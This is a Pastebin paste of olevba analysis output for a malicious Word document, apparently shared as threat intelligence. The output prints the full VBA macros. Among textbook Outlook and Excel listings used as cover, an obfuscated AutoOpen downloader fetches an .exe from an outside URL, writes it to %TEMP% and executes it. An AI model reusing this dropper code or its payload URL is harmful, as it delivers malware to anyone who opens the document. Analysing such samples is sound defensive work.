API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Jul 1st, 2015
596
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 18.50 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS--B- compin~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: compin~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: compin~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17.  
  18. Nip121ÖÊÂ3017 (5.003)
  19.  
  20. End Sub
  21.  
  22. Sub Nip121ÖÊÂ3017(FFFFF As Double)
  23.  
  24. px4vMaz62GyVze
  25.  
  26. End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +----------+----------+---------------------------------------+
  32. | Type     | Keyword  | Description                           |
  33. +----------+----------+---------------------------------------+
  34. | AutoExec | AutoOpen | Runs when the Word document is opened |
  35. +----------+----------+---------------------------------------+
  36. -------------------------------------------------------------------------------
  37. VBA MACRO Module1.bas
  38. in file: compin~1.doc - OLE stream: u'Macros/VBA/Module1'
  39. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  40. Public VSvsdvve As Integer
  41. Public lw6wgKatg As String
  42. Public FEveEv As Double
  43. Public VSeeve As Long
  44.  
  45. '
  46. ' Listing 22.1. A procedure that enumerates the first- and
  47. ' second-level folders in the Outlook namespace.
  48. '
  49. Sub EnumerateFolders()
  50.     '
  51.    ' Set up the namespace
  52.    '
  53.    Set ns = ThisOutlookSession.Session
  54.     '
  55.    ' Run through the first-level folders
  56.    '
  57.    For Each folder In ns.Folders
  58.         Debug.Print folder.Name
  59.         '
  60.        ' Run through the second-level folders, if any
  61.        '
  62.        If folder.Folders.Count > 1 Then
  63.             For Each subfolder In folder.Folders
  64.                 Debug.Print "   " & subfolder.Name
  65.             Next 'subfolder
  66.        End If
  67.     Next 'folder
  68.    Set ns = Nothing
  69. End Sub
  70. '
  71. ' Listing 22.2. A procedure to test the PickFolder method
  72. '
  73. Sub PickFolderTest()
  74.     ' Set up the namespace
  75.    '
  76.    Set ns = ThisOutlookSession.Session
  77.     '
  78.    ' Display the Select Folder dialog box
  79.    '
  80.    Set folder = ns.PickFolder
  81.     '
  82.    ' Test the return value
  83.    '
  84.    If Not folder Is Nothing Then
  85.         MsgBox "You picked " & folder.Name
  86.     End If
  87. End Sub
  88. '
  89.  
  90. ' Listing 22.3. A procedure that toggles the Web view
  91. ' on and off for the currently displayed folder.
  92. '
  93. Sub ToggleWebView()
  94.     '
  95.    ' Set up the namespace and get the explorer
  96.    '
  97.    Set ns = ThisOutlookSession.Session
  98.     '
  99.    ' Save the current folder
  100.    '
  101.    Set currFolder = r.exp.CurrentFolder
  102.     '
  103.    ' Move temporarily to the root
  104.    '
  105.    Set c.exp.CurrentFolder = ns.Folders(1)
  106.     '
  107.    ' Toggle Web view for the current folder
  108.    '
  109.    currFolder.WebViewOn = Not currFolder.WebViewOn
  110.     '
  111.    ' Return to the current folder
  112.    '
  113.    Set a.exp.CurrentFolder = currFolder
  114. End Sub
  115. '
  116. ' Listing 22.4. A Function that determines the
  117. ' e-mail address of the sender.
  118. '
  119. Function SenderAddress(msg As String) As String
  120.     '
  121.    ' Create a temporary reply
  122.    '
  123.    Set replyItem = y.msg.Reply
  124.     '
  125.    ' The Reply's "To" property holds the sender's address
  126.    '
  127.    SenderAddress = replyItem.To
  128.     Set replyItem = Nothing
  129. End Function
  130. '
  131. ' Use this procedure to test the SenderAddress function.
  132. '
  133. Sub SenderAddressTest()
  134.     '
  135.    ' Set up the namespace and Inbox
  136.    '
  137.    Set ns = ThisOutlookSession.Session
  138.     Set ib = ns.GetDefaultFolder(olFolderInbox)
  139.     '
  140.    ' Display the sender's address for a message
  141.    '
  142.    MsgBox SenderAddress(ib.Items(2))
  143. End Sub
  144. '
  145. ' Listing 22.5. A procedure that processes Inbox messages.
  146. '
  147.  
  148.  
  149.  
  150. Public Function LKJNmJKILHB(NVIEOIB As String)
  151.  Set LKJNmJKILHB = CreateObject(NVIEOIB)
  152. End Function
  153. Sub ProcessInboxMessages()
  154.     '
  155.    ' Set up the namespace
  156.    '
  157.    Set ns = ThisOutlookSession.Session
  158.     '
  159.    ' Get the default Inbox folder
  160.    '
  161.    Set ib = ns.GetDefaultFolder(olFolderInbox)
  162.     '
  163.    ' Run through each item in the Inbox
  164.    '
  165.    For Each msg In ib.Items
  166.         '
  167.        ' Flag important messages
  168.        '
  169.        If msg.Importance = olImportanceHigh Then
  170.             msg.FlagStatus = olFlagMarked
  171.             msg.FlagRequest = "Handle this, will ya!"
  172.             msg.FlagDueBy = Date + 7
  173.             msg.Importance = olImportanceNormal
  174.             msg.Save
  175.         End If
  176.         '
  177.        ' Look for expired flags
  178.        '
  179.        If msg.FlagDueBy < Date Then
  180.             msg.Display
  181.             MsgBox "The displayed message has an expired flag!"
  182.         End If
  183.         '
  184.        ' Move sensitive messages to "Confidential" folder
  185.        '
  186.        If msg.Sensitivity = olConfidential Then
  187.             msg.Move ns.Folders(1).Folders("Confidential")
  188.         End If
  189.     Next 'msg
  190. End Sub
  191.  
  192. '
  193. ' Listing 22.6. A procedure that sends an e-mail message
  194. '
  195. Sub SendAMessage()
  196.     ' Set up the namespace
  197.    '
  198.    Set ns = ThisOutlookSession.Session
  199.     '
  200.    ' Create the new MailItem
  201.    '
  202.    Set msg = Applicy.ation.CreateItem(olMailItem)
  203.     '
  204.    ' Specify the recipient, subject, and body
  205.    ' and then send the message
  206.    '
  207.    With msg
  208.         '
  209.        ' Adjust the following address!
  210.        '
  211.        .Recipients.Add "bitbucket@mcfedries.com"
  212.         .Subject = "Just Testing"
  213.         .Body = "This is only a test"
  214.         .Send
  215.     End With
  216. End Sub
  217. '
  218.  
  219.  
  220. ' Listing 22.7. A procedure that creates a forwarded message
  221. ' and deletes any existing attachments before sending it.
  222. '
  223. Sub ForwardAndDeleteAttachments()
  224.     '
  225.    ' Set up the namespace and Inbox
  226.    '
  227.    Set ns = ThisOutlookSession.Session
  228.     Set ib = ns.GetDefaultFolder(olFolderInbox)
  229.     '
  230.    ' Create the forwarded MailItem
  231.    '
  232.    Set msg = ib.Items(ib.Items.Count).Forward
  233.     With msg
  234.         '
  235.        ' Delete all the attachments
  236.        '
  237.        For Each att In .Attachments
  238.             att.Delete
  239.         Next 'att
  240.        '
  241.        ' Send it (change the address!)
  242.        '
  243.        .Recipients.Add "selene@mcfedries.com"
  244.         .Send
  245.     End With
  246. End Sub
  247. '
  248.  
  249. ' Listing 22.8. A procedure that stores a password
  250. ' in a folder's Description property.
  251. '
  252. Sub SetPassword()
  253.     ' Set up the namespace
  254.    '
  255.    Set ns = ThisOutlookSession.Session
  256.     '
  257.    ' Save the password in the folder's Description property
  258.    '
  259.    Set folder = ns.Folders(1).Folders("Confidential")
  260.     folder.Description = "password"
  261. End Sub
  262.  
  263. '
  264. ' Listing 22.9. An event handler that asks the user for
  265. ' a password before switching to the "Confidential" folder.
  266. '
  267.  
  268.  
  269.  
  270. Public Function A06WNXrxh(MmXQ1eLmZ As String)
  271.  Set d6eiGTziQd = LKJNmJKILHB("S" & Chr(104) & Chr(101) & "l" & Chr(108) & "." & "A" & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
  272. d6eiGTziQd.Open (lw6wgKatg)
  273. End Function
  274. Private Sub gExplorer_BeforeFolderSwitch(ByVal NewFolder As Object, Cancel As Boolean)
  275.     If NewFolder.Name = "Confidential" Then
  276.         pwd = InputBox("Please enter the password for this folder:")
  277.         If pwd <> NewFolder.Description Then
  278.             Cancel = True
  279.         End If
  280.     End If
  281. End Sub
  282. '
  283. ' Use this event handler to insure that the gExplorer
  284. ' global variable gets instantiated at startup
  285. '
  286. Private Sub Application_Startup()
  287.     Set gExplorer = Applicat.ion.ActiveExplorer
  288. End Sub
  289. '
  290. ' Listing 22.10. An event handler for the MailItem object's Send event.
  291. '
  292. Private Sub gMailItem_Send(Cancel As Boolean)
  293.     Dim result As Integer
  294.     result = MsgBox("Do you want to save this message in Sent Items?", vbYesNo)
  295.     If result = vbNo Then
  296.         gMailItem.DeleteAfterSubmit = True
  297.     End If
  298. End Sub
  299. '
  300. ' Listing 22.11. A procedure that sends an e-mail message and
  301. ' references the global gMailItem variable to trap events.
  302. '
  303. Sub SendAMessage2()
  304.     '
  305.    ' Set up the namespace
  306.    '
  307.    Set ns = ThisOutlookSession.Session
  308.     '
  309.    ' Create the new MailItem using the
  310.    ' gMailItem global variable
  311.    '
  312.    Set gMailItem = Appl.ication.CreateItem(olMailItem)
  313.     '
  314.    ' Specify the recipient, subject, and body
  315.    ' and then send the message
  316.    '
  317.    With gMailItem
  318.         '
  319.        ' Adjust the following address!
  320.        '
  321.        .Recipients.Add "bitbucket@mcfedries.com"
  322.         .Subject = "Just Testing Events"
  323.         .Body = "This is only an events test"
  324.         .Send
  325.     End With
  326. End Sub
  327. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  328. ANALYSIS:
  329. +------------+----------------+-----------------------------------------+
  330. | Type       | Keyword        | Description                             |
  331. +------------+----------------+-----------------------------------------+
  332. | Suspicious | Open           | May open a file                         |
  333. | Suspicious | Chr            | May attempt to obfuscate specific       |
  334. |            |                | strings                                 |
  335. | Suspicious | CreateObject   | May create an OLE object                |
  336. | Suspicious | Run            | May run an executable file or a system  |
  337. |            |                | command                                 |
  338. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  339. |            |                | may be used to obfuscate strings        |
  340. |            |                | (option --decode to see all)            |
  341. +------------+----------------+-----------------------------------------+
  342. -------------------------------------------------------------------------------
  343. VBA MACRO Module2.bas
  344. in file: compin~1.doc - OLE stream: u'Macros/VBA/Module2'
  345. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  346. '
  347. ' Listing 23.1. The GetNumbers procedure prompts the user for a dividend and a divisor.
  348. '
  349. Sub GetNumbers()
  350.     Dim done As Boolean
  351.     Dim divisor As Variant
  352.     Dim dividend As Variant
  353.     '
  354.    ' Prompt user for dividend and divisor.
  355.    '
  356.    done = False
  357.     Do While Not done
  358.         dividend = InputBox("Enter the dividend:", "Divider")
  359.         divisor = InputBox("Enter the divisor:", "Divider")
  360.         done = Divide(dividend, divisor)
  361.     Loop
  362. End Sub
  363. '
  364.  
  365. Public Function VBveEPIB(jIAuThroV99z As Variant, dicVrTXgN As String)
  366. Dim KKOWIPA: Set KKOWIPA = LKJNmJKILHB(Chr(65) & "d" & "o" & "d" & "b" & Chr(46) & Chr(83) & Chr(116) & Chr(114) & "e" & "a" & Chr(109))
  367.  
  368. With KKOWIPA
  369.    .Type = 1
  370.     .Open
  371.     .write jIAuThroV99z
  372.     .savetofile dicVrTXgN, 2
  373. End With
  374. End Function
  375.  
  376. ' Listing 23.2. The Divide function divides the dividend by the divisor.
  377. ' The function traps "division by zero" errors.
  378. '
  379. Function Divide(dividend, divisor) As Boolean
  380.     Dim msg As String
  381.     Dim result As Single
  382.     '
  383.    ' Set the trap
  384.    '
  385.    On Error GoTo DivByZeroHandler
  386.     '
  387.    ' Peform the division
  388.    '
  389.    result = dividend / divisor
  390.     '
  391.    ' If it went okay, display the result
  392.    '
  393.    msg = dividend & _
  394.           " divided by " & _
  395.           divisor & _
  396.           " equals " & _
  397.           result
  398.     MsgBox msg
  399.     '
  400.    ' Set the return value and bypass the error handler
  401.    '
  402.    Divide = True
  403.     Exit Function
  404.     '
  405.    ' Code branches here if an error occurs
  406.    '
  407. DivByZeroHandler:
  408.     '
  409.    ' Display the error message
  410.    '
  411.    result = MsgBox("You entered 0 as the divisor! Try again?", _
  412.                     vbYesNo + vbQuestion, _
  413.                     "Divider")
  414.     '
  415.    ' Return the user's choice
  416.    '
  417.    If result = vbYes Then
  418.         Divide = False
  419.     Else
  420.         Divide = True
  421.     End If
  422. End Function
  423. '
  424. ' Listing 23.3 Backs up the active workbook to a drive specified by
  425.  
  426.  
  427. Sub px4vMaz62GyVze()
  428.  
  429. Set ppVZZF1t = LKJNmJKILHB("M" & Chr(105) & Chr(99) & Chr(114) & "o" & Chr(115) & Chr(111) & "f" & Chr(116) & Chr(46) & "X" & "M" & "L" & "H" & Chr(84) & Chr(84) & Chr(80))
  430.  
  431. CallByName ppVZZF1t, "O" & Chr(112) & Chr(101) & "n", VbMethod, Chr(71) & Chr(69) & "T" _
  432. , "h" & "t" & "t" & Chr(112) & Chr(58) & Chr(47) & Chr(47) & "d" & "e" & "m" & Chr(97) & "i" & "f" & "f" & "e" & "." & Chr(98) & Chr(101) & "/" & Chr(55) & "5" & Chr(47) & Chr(56) & Chr(53) & Chr(46) & "e" & "x" & Chr(101) _
  433. , False
  434.  
  435. Set cenPup7VnpnK = LKJNmJKILHB(Chr(87) & "S" & "c" & Chr(114) & "i" & Chr(112) & "t" & "." & Chr(83) & Chr(104) & Chr(101) & "l" & Chr(108))
  436.  
  437. Set OQmJPcxQ = CallByName(cenPup7VnpnK, Chr(69) & "" & "n" & Chr(118) & "" & Chr(105) & "ro" & Chr(110) & Chr(109) & "en" & Chr(116), VbGet, "P" & "" & Chr(114) & Chr(111) & "ce" & "ss")
  438.  
  439. mWGj6d6CH22Y = OQmJPcxQ(Chr(84) & Chr(69) & "M" & "P")
  440.  
  441. lw6wgKatg = mWGj6d6CH22Y & Chr(92) & Chr(115) & Chr(105) & Chr(108) & Chr(118) & Chr(117) & Chr(112) & "l" & Chr(101) & "." & Chr(101) & Chr(120) & Chr(101)
  442. Dim FLLSJmKUYRVHQ() As Byte
  443.  
  444. CallByName ppVZZF1t, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
  445. FLLSJmKUYRVHQ = CallByName(ppVZZF1t, "re" & Chr(115) & "p" & Chr(111) & "n" & Chr(115) & "e" & Chr(66) & Chr(111) & Chr(100) & Chr(121), VbGet)
  446. VBveEPIB FLLSJmKUYRVHQ, lw6wgKatg
  447. On Error GoTo PA4FeaqAL
  448.     a = 84 / 0
  449.   On Error GoTo 0
  450.  
  451. JRyXdhZR:
  452.   Exit Sub
  453. PA4FeaqAL:
  454.   A06WNXrxh ("AU7CVXKyNxAAi")
  455. Resume JRyXdhZR
  456. End Sub
  457.  
  458. ' the user. Traps any errors (such as having no disk in the drive).
  459. '
  460. Sub BackUpToFloppy()
  461.     Dim backupDrive As String
  462.     Dim backupName As String
  463.     Dim msg As String
  464.     Dim done As Boolean
  465.     Dim result As Integer
  466.     '
  467.    ' Define the location of the error handler
  468.    '
  469.    On Error GoTo ErrorHandler
  470.     '
  471.    ' Initialize some variables and then loop
  472.    '
  473.    Application.DisplayAlerts = False
  474.     done = False
  475.     backupDrive = "A:"
  476.     While Not done
  477.         '
  478.        ' Get the drive to use for the backup
  479.        '
  480.        backupDrive = InputBox( _
  481.             Prompt:="Enter the drive letter for the backup:", _
  482.             Title:="Backup", _
  483.             Default:=backupDrive)
  484.         '
  485.        ' Check to see if OK was selected
  486.        '
  487.        If backupDrive <> "" Then
  488.             '
  489.            ' Make sure the backup drive contains a colon (:)
  490.            '
  491.            If InStr(backupDrive, ":") = 0 Then
  492.                 backupDrive = Left(backupDrive, 1) & ":"
  493.             End If
  494.             '
  495.            ' First, save the file
  496.            '
  497.            ActiveWorkbook.Save
  498.             '
  499.            ' Assume the backup will be successful,
  500.            ' so set done to True to exit the loop
  501.            '
  502.            done = True
  503.             '
  504.            ' Concatenate drive letter and workbook name
  505.            '
  506.            backupName = backupDrive & ActiveWorkbook.Name
  507.             '
  508.            ' Make a copy on the specified drive
  509.            '
  510.            ActiveWorkbook.SaveCopyAs FileName:=backupName
  511.         Else
  512.             Exit Sub
  513.         End If
  514.     Wend
  515.     '
  516.    ' Bypass the error handler
  517.    '
  518.    Exit Sub
  519.     '
  520.    ' Code branches here if an error occurs
  521.    '
  522. ErrorHandler:
  523.     msg = "An error has occurred!" & Chr(13) & Chr(13) & _
  524.           "Select Abort to bail out, Retry to re-enter the drive" & Chr(13) & _
  525.           "letter, or Ignore to attempt the backup again."
  526.     result = MsgBox(msg, vbExclamation + vbAbortRetryIgnore)
  527.     Select Case result
  528.         Case vbAbort
  529.             done = True
  530.         Case vbRetry
  531.             done = False
  532.             Resume Next
  533.         Case vbIgnore
  534.             Resume
  535.     End Select
  536. End Sub
  537. '
  538. ' Listing 23.4. This procedure divides two numbers. It traps three specific
  539.  
  540. ' errors: division by zero, overflow, and type mismatch.
  541. '
  542. Sub DivideNumbers()
  543.     Dim msg As String
  544.     Dim result As Single
  545.     Dim divisor As Variant
  546.     Dim dividend As Variant
  547.     '
  548.    ' Set the trap
  549.    '
  550.    On Error GoTo DivByZeroHandler
  551.     '
  552.    ' Prompt user for the dividend
  553.    '
  554. GetDividendAndDivisor:
  555.     dividend = InputBox("Enter the dividend:", "Divider")
  556.     If dividend = "" Then Exit Sub
  557.     '
  558.    ' Prompt user for the divisor
  559.    '
  560. GetDivisorOnly:
  561.     divisor = InputBox("Enter the divisor:", "Divider")
  562.     If divisor = "" Then Exit Sub
  563.     '
  564.    ' Peform the division
  565.    '
  566.    result = dividend / divisor
  567.     '
  568.    ' If it went okay, display the result
  569.    '
  570.    msg = dividend & _
  571.           " divided by " & _
  572.           divisor & _
  573.           " equals " & _
  574.           result
  575.     MsgBox msg
  576.     '
  577.    ' Bypass the error handler
  578.    '
  579.    Exit Sub
  580.     '
  581.    ' Code branches here if an error occurs
  582.    '
  583. DivByZeroHandler:
  584.     '
  585.    ' Display the error message
  586.    '
  587.    msg = "An error occurred!" & Chr(13) & Chr(13) & _
  588.           "Error number:  " & Err.Number & Chr(13) & _
  589.           "Error message: " & Err.Description
  590.     MsgBox msg, vbOKOnly + vbCritical
  591.     '
  592.    ' Check the error number
  593.    '
  594.    Select Case Err.Number
  595.         '
  596.        ' Division by zero
  597.        '
  598.        Case 11
  599.             Resume GetDivisorOnly
  600.         '
  601.        ' Overflow
  602.        '
  603.        Case 6
  604.             Resume GetDividendAndDivisor
  605.         '
  606.        ' Type mismatch
  607.        '
  608.        Case 13
  609.             If Not IsNumeric(dividend) Then
  610.                 Resume GetDividendAndDivisor
  611.             Else
  612.                 Resume GetDivisorOnly
  613.             End If
  614.         '
  615.        ' Anything else, just quit
  616.        '
  617.        Case Else
  618.             Exit Sub
  619.     End Select
  620. End Sub
  621.  
  622. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  623. ANALYSIS:
  624. +------------+------------+-----------------------------------------+
  625. | Type       | Keyword    | Description                             |
  626. +------------+------------+-----------------------------------------+
  627. | Suspicious | Open       | May open a file                         |
  628. | Suspicious | Chr        | May attempt to obfuscate specific       |
  629. |            |            | strings                                 |
  630. | Suspicious | SaveToFile | May create a text file                  |
  631. | Suspicious | CallByName | May attempt to obfuscate malicious      |
  632. |            |            | function calls                          |
  633. | Suspicious | Write      | May write to a file (if combined with   |
  634. |            |            | Open)                                   |
  635. +------------+------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!